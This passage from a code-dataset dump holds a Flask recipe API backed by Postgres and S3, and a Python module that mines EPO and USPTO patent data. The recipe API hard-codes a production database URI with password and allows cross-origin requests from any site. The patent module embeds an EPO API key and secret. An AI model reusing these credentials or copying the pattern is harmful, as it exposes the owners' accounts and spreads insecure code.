"call"}, {"api_name": "utils.is_literal", "line_number": 42, "usage_type": "call"}, {"api_name": "ansi.sformat", "line_number": 43, "usage_type": "call"}, {"api_name": "ansi.sformat.blue", "line_number": 43, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 45, "usage_type": "call"}, {"api_name": "ansi.sformat.dim", "line_number": 47, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 47, "usage_type": "name"}, {"api_name": "ansi.sformat", "line_number": 53, "usage_type": "call"}, {"api_name": "ansi.sformat.yellow", "line_number": 53, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 89, "usage_type": "call"}, {"api_name": "ansi.sformat.magenta", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ansi.sformat.green", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 90, "usage_type": "call"}, {"api_name": "ansi.sformat.green", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ansi.sformat.italic", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 93, "usage_type": "call"}, {"api_name": "ansi.sformat.dim", "line_number": 93, "usage_type": "attribute"}, {"api_name": "utils.env_bool", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.use_highlight", "line_number": 117, "usage_type": "call"}, {"api_name": "pdb.Pdb", "line_number": 132, "usage_type": "call"}, {"api_name": "timer.Timer", "line_number": 135, "usage_type": "call"}, {"api_name": "timer.Timer", "line_number": 134, "usage_type": "name"}, {"api_name": "sys._getframe", "line_number": 143, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 158, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 161, "usage_type": "call"}, {"api_name": "executing.Source.for_frame", "line_number": 173, "usage_type": "call"}, {"api_name": "executing.Source", "line_number": 173, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 206, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 214, "usage_type": "attribute"}, {"api_name": "{'pdb': 'pdb', 'Path': 'pathlib.Path', 'executing': 'executing', 'ast': 'ast'}", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "1079645645", "text": "from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\nimport boto3\nimport random\nfrom config import S3_BUCKET, S3_KEY, S3_SECRET\nfrom flask_cors import CORS, cross_origin\n\n##aws authenticate\ns3 = boto3.client(\n\t's3',\n\taws_access_key_id=S3_KEY,\n\taws_secret_access_key=S3_SECRET,\n\tregion_name='eu-west-2')\n\n## init app\napp = Flask(__name__)\n\n##allows for cross origin api calls\ncors = CORS(app, resources={r\"*\": {\"origins\": \"*\"}})\n\n##gets base dir\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n##database\nENV = 'prodfr'\nif ENV == 'dev':\n\tapp.debug = True\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://chrishext:chris123@localhost/vegoodies'\nelse:\n\tapp.debug = False\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://bxfrgvoddyuuzt:076e702b81c864d45bcc727ca26fd5212736eab54caa64811083a9a33d95bf19@ec2-54-247-79-178.eu-west-1.compute.amazonaws.com:5432/d5t0u3dad8j19d'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n##init db\ndb = SQLAlchemy(app)\n\n#init ma\nma = Marshmallow(app)\n\n##recipe class/model \nclass Recipe(db.Model):\n\t__tablename__ = 'recipes'\n\tid = db.Column(db.Integer, primary_key=True)\n\trecipe_type = db.Column(db.String(30))\n\ttitle = db.Column(db.String(100))\n\tname = db.Column(db.String(100), unique=True)\n\toverview = db.Column(db.String(5000))\n\tmethod = db.Column(db.String(20000))\n\tingredients = db.Column(db.String(20000))\n\ttags = db.Column(db.String(5000))\n\tportions = db.Column(db.String(200))\n\tauthor = db.Column(db.String(100))\n\timage = db.Column(db.String(100))\n\n\tdef __init__(self, recipe_type, title, name, overview, method, ingredients, tags, portions, author, image):\n\t\tself.recipe_type = recipe_type\n\t\tself.title = title\n\t\tself.name = name\n\t\tself.overview = overview\n\t\tself.method = method\n\t\tself.ingredients = ingredients\n\t\tself.tags = tags\n\t\tself.portions = portions\n\t\tself.author = author\n\t\tself.image = image\n\n##recipe schema\nclass RecipeSchema(ma.Schema):\n\tclass Meta:\n\t\tfields = ('id', 'recipe_type', 'title', 'name', 'overview', 'method', 'ingredients', 'tags', 'portions', 'author', 'image')\n\n##init schema\nrecipe_schema = RecipeSchema()\nrecipes_schema = RecipeSchema(many=True)\n\n##create recipe\n@app.route('/recipe',methods=['POST'])\ndef add_recipe():\n\n\ttry: \n\t\ttitle = request.form['title']\n\t\trecipe_type = request.form['recipe_type']\n\t\tname = request.form['title'].replace(' ','').lower()\n\t\toverview = request.form['overview']\n\t\tmethod = request.form['method']\n\t\tingredients = request.form['ingredients']\n\t\ttags = request.form['tags']\n\t\tportions = request.form['portions']\n\t\tauthor = request.form['author']\n\n\t\tif request.files['image']:\n\t\t\tfile = request.files['image']\n\t\t\timage = file.filename\n\n\t\t\ts3_resource = boto3.resource('s3',\n\t\t\t\taws_access_key_id=S3_KEY,\n\t\t\t\taws_secret_access_key=S3_SECRET,\n\t\t\t\tregion_name='eu-west-2')\n\t\t\tmy_bucket = s3_resource.Bucket(S3_BUCKET)\n\t\t\tmy_bucket.Object(file.filename).put(Body=file)\n\t\telse:\n\t\t\timage = \"\"\n\n\n\t\tnew_recipe = Recipe(recipe_type, title, name, overview, method, ingredients, tags, portions, author, image)\n\t\tdb.session.add(new_recipe)\n\t\tdb.session.commit()\n\t\tresponse = recipe_schema.jsonify(new_recipe)\n\t\tresponse.headers['Access-Control-Allow-Origin'] = 
'*'\n\t\tresponse.headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization'\n\t\tresponse.headers['Access-Control-Allow-Methods'] = 'OPTIONS, HEAD, GET, POST, DELETE, PUT'\n\texcept:\n\t\tresponse = \"There was an error, please try again\", 400\n\n\treturn response\n\n\n##get all recipes\n@app.route('/recipe',methods=['GET'])\ndef get_recipes():\n\tall_recipes = Recipe.query.all()\n\trandom.shuffle(all_recipes)\n\tprint(type(all_recipes))\n\n\t##generate aws image link\n\tfor recipe in all_recipes:\n\t\tif recipe.image:\n\t\t\trecipe.image = s3.generate_presigned_url('get_object', Params = {'Bucket': S3_BUCKET, 'Key': recipe.image}, ExpiresIn = 100)\n\n\tresult = recipes_schema.dump(all_recipes)\n\treturn jsonify(result)\n\n##get single recipe\n@app.route(\"/recipe/<id>\",methods=['GET'])\ndef get_recipe(id):\n\trecipe = Recipe.query.get(id)\n\n\t##generates aws image link\n\tif recipe.image:\n\t\trecipe.image = s3.generate_presigned_url('get_object', Params = {'Bucket': S3_BUCKET, 'Key': recipe.image}, ExpiresIn = 100)\n\n\treturn recipe_schema.jsonify(recipe)\n\n\n## run server\nif __name__ == '__main__':\n\tapp.run(debug=True)\n", "repo_name": "crhext/vegoodies-flask-api", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "boto3.client", "line_number": 11, "usage_type": "call"}, {"api_name": "config.S3_KEY", "line_number": 13, "usage_type": "name"}, {"api_name": "config.S3_SECRET", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_marshmallow.Marshmallow", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, 
{"api_name": "flask.request.files", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 94, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 94, "usage_type": "name"}, {"api_name": "boto3.resource", "line_number": 97, "usage_type": "call"}, {"api_name": "config.S3_KEY", "line_number": 98, "usage_type": "name"}, {"api_name": "config.S3_SECRET", "line_number": 99, "usage_type": "name"}, {"api_name": "config.S3_BUCKET", "line_number": 101, "usage_type": "argument"}, {"api_name": "random.shuffle", "line_number": 124, "usage_type": "call"}, {"api_name": "config.S3_BUCKET", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 133, "usage_type": "call"}, {"api_name": "config.S3_BUCKET", "line_number": 142, "usage_type": "name"}]}
+{"seq_id": "72074171609", "text": "\r\nimport os\r\nimport xml.etree.ElementTree as et\r\nfrom xml.dom import minidom\r\nimport epo_ops\r\nimport time\r\nimport json\r\nimport requests\r\nimport urllib.parse\r\nfrom .references import DocMine,TITLE,AUTHORS,ABSTRACT,PATENT_APP_NUM,PATENT_GRANT_NUM,CLAIMS\r\n\r\nfrom requests.models import HTTPError\r\n\r\ninhaling_preparations = {'A61K009/12', 'A61K009/0073', 'A61K009/0075','A61K009/0078','A61K009/008','A61K49/1815','A61K8/046','A61K51/1206','A61K51/1231'}\r\ninhaling_mixing_methods = {'B01F003/04992','B01F003/04007','B01F2003/0057'} #CPC/B01F3/04992 - to search in uspto\r\ninhaling_devices= {'A61M015/00','A61M015/0001','A61M015/0003','A61M015/0005','A61M015/0006','A61M015/0008','A61M015/001','A61M015/0011','A61M015/0013','A61M015/0015','A61M015/0016','A61M015/0018','A61M015/002','A61M015/0021','A61M015/0023','A61M015/0025','A61M015/0026','A61M015/0028','A61M015/003','A61M015/0031','A61M015/0033','A61M015/0035','A61M015/0036','A61M015/0038','A61M015/004','A61M015/0041','A61M015/0043','A61M015/0045','A61M015/0046','A61M015/0048','A61M015/005','A61M015/0051','A61M015/0053','A61M015/0055','A61M015/0056','A61M015/0058','A61M015/006','A61M015/0061','A61M015/0063','A61M015/0065','A61M015/0066','A61M015/0068','A61M015/007','A61M015/0071','A61M015/0073','A61M015/0075','A61M015/0076','A61M015/0078','A61M015/008','A61M015/0081','A61M015/0083','A61M015/0085','A61M015/0086','A61M015/0088','A61M015/009','A61M015/0091','A61M015/0093','A61M015/0095','A61M015/0096','A61M015/0098','A61M015/02','A61M015/025','A61M015/06','A61M015/08','A61M015/085'}\r\nsmoking_devices= {'A24F040', 'A24F042', 'A24F047'}\r\n\r\nallowed_ipc_codes = inhaling_preparations|inhaling_mixing_methods|inhaling_devices\r\nallowed_ipc_codes = inhaling_mixing_methods\r\n\r\ninhaling_preparations = ['A61K9/0073', 'A61K9/0075','A61K9/0078','A61K8/046','A61K51/1206','A61K51/1231','A61K49/1815']#,'A61K9/008','A61K9/12']\r\n\r\nOPS_APIKEY = 'zMxluGSzvCvEtdQ1xP1QK7zA9Gt6fpZc'\r\nOPS_SECRET = 'QyM48SYC04K7QSyh'\r\n\r\n \r\ndef cleanup_authors(names:list):\r\n to_return = set()\r\n for name in names:\r\n n = str(name)\r\n n = n.strip(' .,\\n\\t')\r\n if n[-1] == ']':\r\n n = n[:n.rfind('[')]\r\n if n[-1] == '\\u2002':\r\n n = n[:-1]\r\n \r\n n = n.title().replace(',','')\r\n to_return.add(n)\r\n return to_return\r\n\r\ndef cleanup_institutions(names:list):\r\n to_return = list(cleanup_authors(names))\r\n for i in range(0, len(to_return)):\r\n n = str(to_return[i])\r\n n = n.replace(' Corporation', '')\r\n n = n.replace(' Corp', '')\r\n n = n.replace(' Incorporated', '')\r\n n = n.replace(' Limited', '')\r\n n = n.replace(' S.P.A', '')\r\n n = n.replace(' Gmbh', '')\r\n if n[:4] == 'The': \r\n n = n[4:]\r\n\r\n if n[-3:] in {' Co',' Sa',' Bv',' Cv',' Ag'}:\r\n n = n[:-3]\r\n if n[-4:] in {' Spa',' Ltd',' Llc',' Inc',' B V',' B.V',' S.A',' C.V'}:\r\n n = n[:-4]\r\n to_return[i] = n\r\n return set(to_return)\r\n\r\ndef print_tags(tree:et.ElementTree):\r\n print ([e.tag for e in tree.iter()]) #to get list of tags\r\n\r\n\r\nclass OPSxml(DocMine):\r\n @staticmethod\r\n def tag(tag):\r\n return '{http://www.epo.org/exchange}'+tag\r\n\r\n\r\n def __init__(self, patent_in_opsxml:et.Element):\r\n self.document = patent_in_opsxml.find(self.tag('exchange-documents')+'/'+self.tag('exchange-document'))\r\n\r\n doc_id = self.document.find(self.tag('bibliographic-data')+'/'+self.tag('publication-reference')+'/'+self.tag('document-id'))\r\n pat_num = self.document.get('country') + 
self.document.get('doc-number')+ self.document.get('kind')\r\n        super().__init__(PATENT_GRANT_NUM, pat_num)\r\n\r\n        app_ref = self.document.find(self.tag('bibliographic-data')+'/'+self.tag('application-reference'))\r\n        \r\n        applications = list()\r\n        doc = app_ref.find(self.tag('document-id'))\r\n        #print_tags(doc)\r\n        f = doc.find(self.tag('country'))\r\n        app_country = f.text\r\n        app_num = doc.find(self.tag('doc-number')).text\r\n        app_kind = doc.find(self.tag('kind')).text\r\n        self.Identifiers[PATENT_APP_NUM] = app_country+app_num+app_kind\r\n\r\n        self.patent = patent_in_opsxml # kept: write() serializes this element\r\n        self['file'] = ['']\r\n        self.append_property('doc_number',self.document.get('doc-number'))\r\n        self.append_property('country', self.document.get('country'))\r\n        self.append_property('kind', self.document.get('kind'))\r\n        self.append_property('family-id',self.document.get('family-id'))\r\n        date = doc_id.find(self.tag('date')).text\r\n        self.set_date(date[:4],date[4:6],date[6:8])\r\n\r\n    @staticmethod\r\n    def loads(xml_file:str):\r\n        try:\r\n            tree = et.parse(xml_file)\r\n        except et.ParseError: \r\n            return None\r\n        return tree.getroot()\r\n    \r\n    @classmethod\r\n    def from_file(cls, xml_file:str):\r\n        try:\r\n            patent = cls.loads(xml_file)\r\n            if isinstance(patent,et.Element):\r\n                c= cls(patent)\r\n                file = xml_file[xml_file.rfind('/')+1:]\r\n                c['file'] = [file[file.rfind('\\\\')+1:]]\r\n                return c\r\n        except et.ParseError: \r\n            return None\r\n\r\n    @staticmethod\r\n    def parse_patnum(patnum:str):\r\n        allowed_chars = ['A','B','C','U','T','L','E']\r\n        country = patnum[:2]\r\n\r\n        if patnum[-2] in allowed_chars:\r\n            kind_pos = len(patnum)-2\r\n        elif patnum[-1] in allowed_chars:\r\n            kind_pos = len(patnum)-1\r\n        else: kind_pos = len(patnum)\r\n\r\n        doc_number = patnum[2:kind_pos]\r\n        kind = patnum[kind_pos:]\r\n\r\n        return country, doc_number, kind\r\n\r\n\r\n    def get_cpc_codes(self): ##get document from patent using opsxml_get_docnum\r\n        self.cpc_codes = set()\r\n        patent_classifications = self.document.findall('./{ns1}bibliographic-data/{ns1}patent-classifications/{ns1}patent-classification'.format(ns1='{http://www.epo.org/exchange}'))\r\n        for classification in patent_classifications:\r\n            section = classification.find(self.tag('section')).text\r\n            code_class = classification.find(self.tag('class')).text\r\n            subclass = classification.find(self.tag('subclass')).text\r\n            main_group = classification.find(self.tag('main-group')).text\r\n            subgroup = classification.find(self.tag('subgroup')).text\r\n            self.update_with_value('cpc_codes',section+code_class+subclass+main_group+'-'+subgroup)\r\n\r\n    def has_cpc_codes(self, allowed_cpc_codes:set): ##get document from patent using opsxml_get_docnum\r\n        patent_classifications = self.document.findall('./{ns1}bibliographic-data/{ns1}patent-classifications/{ns1}patent-classification'.format(ns1='{http://www.epo.org/exchange}'))\r\n        for classification in patent_classifications:\r\n            section = classification.find(self.tag('section')).text\r\n            code_class = classification.find(self.tag('class')).text\r\n            subclass = classification.find(self.tag('subclass')).text\r\n            main_group = classification.find(self.tag('main-group')).text\r\n            subgroup = classification.find(self.tag('subgroup')).text\r\n            cpc_code = section+code_class+subclass+main_group+'-'+subgroup\r\n            if cpc_code in allowed_cpc_codes: return cpc_code\r\n        return ''\r\n\r\n    def set_title(self):\r\n        if not hasattr(self,'title'):\r\n            tit = self.document.find('./{ns1}bibliographic-data/{ns1}invention-title[@lang=\'en\']'.format(ns1='{http://www.epo.org/exchange}'))\r\n            
title = tit.text.strip().title() if type(tit) != type(None) else ''\r\n self._set_title(title)\r\n\r\n def get_data(self):\r\n applicants = self.document.findall('./{ns1}bibliographic-data/{ns1}parties/{ns1}applicants/{ns1}applicant/{ns1}applicant-name/{ns1}name'.format(ns1='{http://www.epo.org/exchange}'))\r\n applicant_names = {x.text for x in applicants}\r\n applicant_names = cleanup_institutions(list(applicant_names))\r\n inventors = self.document.findall('./{ns1}bibliographic-data/{ns1}parties/{ns1}inventors/{ns1}inventor/{ns1}inventor-name/{ns1}name'.format(ns1='{http://www.epo.org/exchange}'))\r\n inventor_names = {x.text for x in inventors}\r\n self.update_with_list(AUTHORS,cleanup_authors(list(inventor_names)))\r\n\r\n #self.update_with_list(INSTITUTIONS,list(applicant_names.difference(inventor_names)))\r\n self.addresses = {i:i for i in list(applicant_names.difference(inventor_names))}\r\n\r\n self.set_title()\r\n abs = self.document.find('./{ns1}abstract[@lang=\\'en\\']/{ns1}p'.format(ns1='{http://www.epo.org/exchange}'))\r\n abstract = abs.text if type(abs) != type(None) else ''\r\n self.add2section(ABSTRACT,abstract.strip())\r\n\r\n\r\n def make_fname(self, cpc_code:str='', file_extension='xml'):\r\n try:\r\n title = str(self[TITLE][0])\r\n except KeyError:\r\n self.set_title()\r\n title = str(self[TITLE][0])\r\n \r\n title = title.replace('/','_')[:225]\r\n title = title.replace('\\\"','')\r\n title = title.replace('?','xxx')\r\n title = title.replace('\\n', ' ')\r\n title = title.replace(',', '')\r\n\r\n code = cpc_code.replace('/','-')\r\n code = code.replace('_','-')\r\n\r\n return code+'_'+self['family-id']+'_('+self[PATENT_GRANT_NUM]+')_'+title+'.'+file_extension\r\n\r\n def write(self, patent_dir:str, allowed_cpc_codes:set):\r\n fname = self.make_fname(self.has_cpc_codes(allowed_cpc_codes))\r\n with open(patent_dir+fname,'w',encoding='utf-8') as f:\r\n patent_xml = minidom.parseString(et.tostring(self.patent)).toprettyxml(indent=' ')\r\n f.write(patent_xml)\r\n\r\n\r\nclass EPOxml(DocMine):\r\n def __init__(self, patent_in_epoxml:et.Element):\r\n self.document = self.patent = patent_in_epoxml\r\n pat_num = self.document.get('country') + self.document.get('doc-number')\r\n super().__init__(PATENT_GRANT_NUM, pat_num)\r\n\r\n app_ref = self.document.find('./SDOBI/B100')\r\n app_country = app_ref.find('./B190').text\r\n app_num = app_ref.find('./B110').text\r\n app_kind = app_ref.find('./B130').text\r\n self.Identifiers[PATENT_APP_NUM] = app_country+app_num+app_kind\r\n\r\n self.append_property('file','')\r\n self.append_property('doc_number',self.document.get('doc-number'))\r\n self.append_property('country', self.document.get('country'))\r\n self.append_property('kind', self.document.get('kind'))\r\n\r\n \r\n def get_data(self):\r\n language_names = self.patent.findall('./SDOBI/B500/B540/B541')\r\n titles = self.patent.findall('./SDOBI/B500/B540/B542')\r\n for i in range(0, len(language_names)):\r\n if language_names[i].text == 'en':\r\n self._set_title(titles[i].text)\r\n break\r\n\r\n date = self.patent.find('./SDOBI/B100/B140/date').text\r\n self.set_date(date[:4],date[4:6],date[6:])\r\n\r\n abstract = self.patent.find('./abstract[@lang=\\'en\\']/p')\r\n abstract = abstract.text if type(abstract) != type(None) else ''\r\n self.add2section(ABSTRACT,abstract)\r\n\r\n institutions = self.patent.findall('./SDOBI/B700/B710/B711/snm')\r\n institutions = {x.text for x in institutions}\r\n institutions = cleanup_institutions(institutions)\r\n self.addresses = {x:x for x in 
institutions}\r\n #self.update_with_list(list(cleanup_institutions(institutions)))\r\n\r\n authors = self.patent.findall('./SDOBI/B700/B720/B721/snm')\r\n authors = {x.text for x in authors}\r\n self.update_with_list(AUTHORS, list(cleanup_authors(list(authors))))\r\n\r\n claims = self.patent.findall('./claims/claim/claim-text')\r\n claims = {x.text for x in claims if type(x.text) != type(None)}\r\n for c in claims:\r\n self.add2section(CLAIMS,c)\r\n\r\n @staticmethod\r\n def loads(xml_file:str):\r\n try:\r\n tree = et.parse(xml_file)\r\n except et.ParseError: \r\n return None\r\n return tree.getroot()\r\n \r\n @classmethod\r\n def from_file(cls, xml_file:str):\r\n try:\r\n c = cls(cls.loads(xml_file))\r\n file = xml_file[xml_file.rfind('/')+1:]\r\n c['file'] = [file[file.rfind('\\\\')+1:]]\r\n return c\r\n except et.ParseError: \r\n return None\r\n\r\n\r\nclass USPTOjson (DocMine):\r\n def __init__(self, result_elements:list):\r\n self.patent = result_elements\r\n try:\r\n doc_number = self.patent['grantDocumentIdentifier']\r\n id_type = PATENT_GRANT_NUM\r\n date = self.patent['grantDate'] \r\n self.append_property('Application Date', self.patent['filingDate'])\r\n except KeyError:\r\n doc_number = self.patent['patentApplicationNumber']\r\n id_type = PATENT_APP_NUM\r\n date = self.patent['filingDate']\r\n \r\n super().__init__(id_type,doc_number)\r\n self.Identifiers[PATENT_APP_NUM] = self.patent['patentApplicationNumber']\r\n\r\n self.append_property('doc_number', doc_number[2:])\r\n self.append_property('country', doc_number[:2])\r\n self.set_date(date[-4:],date[:2],date[3:5])\r\n\r\n def get_cpc_codes(self):\r\n main_cpc = str(self.patent['mainCPCSymbolText'])\r\n self.append_property('CPC',main_cpc)\r\n further_cpcs = list(self.patent['furtherCPCSymbolArrayText'])\r\n self.update_with_list('CPC',further_cpcs)\r\n\r\n\r\n def has_cpc_codes(self, allowed_cpc_codes:set): \r\n main_cpc = str(self.patent['mainCPCSymbolText']).replace('/','-')\r\n if main_cpc in allowed_cpc_codes: return main_cpc\r\n\r\n cpcs = self.patent['furtherCPCSymbolArrayText']\r\n if type(cpcs) == type(None): return ''\r\n for c in cpcs:\r\n cpc_for_fname = str(c).replace('/','-')\r\n if cpc_for_fname in allowed_cpc_codes: return cpc_for_fname\r\n return ''\r\n\r\n def set_title(self):\r\n self._set_title(self.patent['inventionTitle'])\r\n\r\n def get_data(self):\r\n self.set_title()\r\n self.inventor_names = list(self.patent['inventorNameArrayText'])\r\n self.update_with_list(AUTHORS, list(cleanup_authors(self.inventor_names)))\r\n if type (self.patent['assigneeEntityName']) != type(None):\r\n institutions = [self.patent['assigneeEntityName']]\r\n institutions = cleanup_institutions(institutions)\r\n self.addresses = {x:x for x in institutions}\r\n #self.update_with_list(INSTITUTIONS, cleanup_institutions(institutions))\r\n\r\n abstract = self.patent['abstractText'][0]\r\n self.add2section(ABSTRACT,abstract)\r\n\r\n ct = self.patent['claimText']\r\n claims_text = str(self.patent['claimText'][0]) if type (ct) != type(None) else ''\r\n for i in range (1,9):\r\n claims_text = claims_text.replace(str(i)+'. ','|')\r\n claims = claims_text.split('|')\r\n \r\n for c in claims:\r\n if c:\r\n claims_pretty = list()\r\n ctext = c[:-1] if c[-1].isdigit() else c\r\n split_text = ctext.split(';')\r\n for s in split_text:\r\n more_splits = s.split(', ') if len(s) >= 3500 else [s]\r\n claims_pretty += more_splits\r\n \r\n claim_text = '. 
'.join(claims_pretty)\r\n self.add2section(CLAIMS,claim_text)\r\n\r\n def make_fname(self, cpc_code:str='', file_extension='xml'):\r\n try:\r\n title = str(self[TITLE][0])\r\n except KeyError:\r\n self.set_title()\r\n title = str(self[TITLE][0])\r\n \r\n title = title.replace('/','_')[:225]\r\n title = title.replace('\\\"','')\r\n title = title.replace('?','xxx')\r\n title = title.replace('\\n', ' ')\r\n title = title.replace(',', '')\r\n\r\n code = cpc_code.replace('/','-')\r\n code = code.replace('_','-')\r\n\r\n pat_grant_num = str()\r\n try:\r\n pat_grant_num = self.Identifiers[PATENT_GRANT_NUM]\r\n except KeyError: pass\r\n pat_app_num = self.Identifiers[PATENT_APP_NUM]\r\n\r\n if pat_grant_num:\r\n fname = code+'_'+pat_grant_num+'_'+title+'.'+file_extension\r\n else:\r\n fname = code+'(_'+pat_app_num+')_'+title+'.'+file_extension\r\n\r\n return fname\r\n\r\n def write(self, patent_dir:str, allowed_cpc_codes:set):\r\n fname = self.make_fname(self.has_cpc_codes(allowed_cpc_codes),'json')\r\n with open(patent_dir+fname,'w',encoding='utf-8') as f:\r\n f.write(json.dumps(self.patent, indent=1))\r\n\r\n @staticmethod\r\n def loads(json_file:str):\r\n return json.load(open(json_file))\r\n \r\n @classmethod\r\n def from_file(cls, json_file:str):\r\n c = cls(cls.loads(json_file))\r\n file = json_file[json_file.rfind('/')+1:]\r\n c['file'] = [file[file.rfind('\\\\')+1:]]\r\n return c\r\n\r\ndef has_ipc(ipc_code:str):\r\n if ipc_code in allowed_ipc_codes: return True\r\n ipc_base = ipc_code[:ipc_code.find('/')]\r\n return ipc_base in smoking_devices\r\n\r\n\r\ndef is_patent_start(line:str):\r\n if line[:23] == '': return True\r\n else: return False\r\n\r\ndef is_patent_end(line:str):\r\n if line[:24] == ' ': return True\r\n elif line == '': return True\r\n else: return False\r\n\r\ndef normalizeEPOipc(ipc_code:str, skip=1):\r\n ipc_code = ipc_code.strip()\r\n slash_pos = ipc_code.find('/')\r\n main_class = ipc_code[skip:slash_pos]\r\n main_class = main_class.split(' ')\r\n if len(main_class) > 2:\r\n classification_section = main_class[0]\r\n classification_class = main_class[1]\r\n classification_main_group = main_class[-1]\r\n elif len(main_class) == 2:\r\n classification_section = main_class[0]\r\n classification_class = main_class[1]\r\n classification_main_group = ''\r\n else:\r\n print('Unknown ipc code format: %s' % ipc_code)\r\n\r\n if len(classification_main_group) == 0: classification_main_group = '000' \r\n if len(classification_main_group) == 1: classification_main_group = '00'+classification_main_group\r\n if len(classification_main_group) == 2: classification_main_group = '0'+classification_main_group\r\n\r\n subgroup = ipc_code[slash_pos+1 : ].strip()\r\n subgroup = subgroup.split(' ')\r\n subgroup = subgroup[0]\r\n\r\n normalized_ipc_code = classification_section+classification_class+classification_main_group+'/'+subgroup\r\n return normalized_ipc_code\r\n\r\ndef load_docnumbers(fname:str, col_number:int=0, has_header=False):\r\n doc_numbers = list()\r\n \r\n with open(fname, 'r') as listing:\r\n if has_header: line = listing.readline()\r\n line = listing.readline().strip()\r\n while line:\r\n columns = line.split('\\t')\r\n #country, doc_number, kind = OPSxml.parse_patnum(columns[0])\r\n doc_numbers.append(columns[col_number])\r\n line = listing.readline().strip()\r\n return doc_numbers\r\n\r\n\r\ndef do_biblio_search(cql_query):\r\n client = epo_ops.Client(key=OPS_APIKEY, secret=OPS_SECRET)\r\n try:\r\n # getting search result counts\r\n search_response = 
client.published_data_search(cql=cql_query)\r\n    except HTTPError: \r\n        print('no patents found for cql query %s' % cql_query)\r\n        return []\r\n\r\n    search_response_xml = str(search_response.content,encoding='utf-8')\r\n    tree = et.fromstring(search_response_xml)\r\n    biblio_search = tree.find('{http://ops.epo.org}biblio-search')\r\n    found_patents = int(biblio_search.attrib['total-result-count'])\r\n    print('%d patents found for %s query' % (found_patents,cql_query))\r\n    refs = biblio_search.findall('./{http://ops.epo.org}search-result/{http://ops.epo.org}publication-reference/')\r\n\r\n    doc_ids = set()\r\n    for pat_id in refs:\r\n        #parsing search results\r\n        #id_type = pat_id.attrib['document-id-type']\r\n        #print ([elem.tag for elem in pat_id.iter()]) #to get list of tags\r\n        country = pat_id.find('./{http://www.epo.org/exchange}country').text\r\n        doc_number = pat_id.find('./{http://www.epo.org/exchange}doc-number').text\r\n        kind = pat_id.find('./{http://www.epo.org/exchange}kind').text\r\n        doc_ids.add(country+doc_number+kind)\r\n\r\n    return doc_ids\r\n\r\ndef cache_exist_patnum(patent_dir:str,allowed_countries:set=None,with_kind=True):\r\n    exist_docnums = set()\r\n    for root, subdirs, files in os.walk(patent_dir):\r\n        if files:\r\n            print('searching in %s directory' % root)\r\n            for xml_file in files:\r\n                file_path = os.path.join(root, xml_file)\r\n                try:\r\n                    tree = et.parse(file_path)\r\n                except (et.ParseError, FileNotFoundError): continue\r\n                patent = OPSxml(tree.getroot())\r\n                patent.get_docnum()\r\n                if isinstance(allowed_countries, set):\r\n                    if patent.country in allowed_countries:\r\n                        docnum = patent.pat_number+patent.kind if with_kind else patent.pat_number\r\n                        exist_docnums.add(docnum)\r\n                else:\r\n                    docnum = patent.pat_number+patent.kind if with_kind else patent.pat_number\r\n                    exist_docnums.add(docnum)\r\n    return exist_docnums\r\n\r\ndef download_patent(country, doc_number, kind):\r\n    client = epo_ops.Client(key=OPS_APIKEY, secret=OPS_SECRET)\r\n    return client.published_data( # Retrieve bibliography data\r\n        reference_type = 'publication', # publication, application, priority\r\n        input = epo_ops.models.Docdb(doc_number, country, kind), # original, docdb, epodoc\r\n        endpoint = 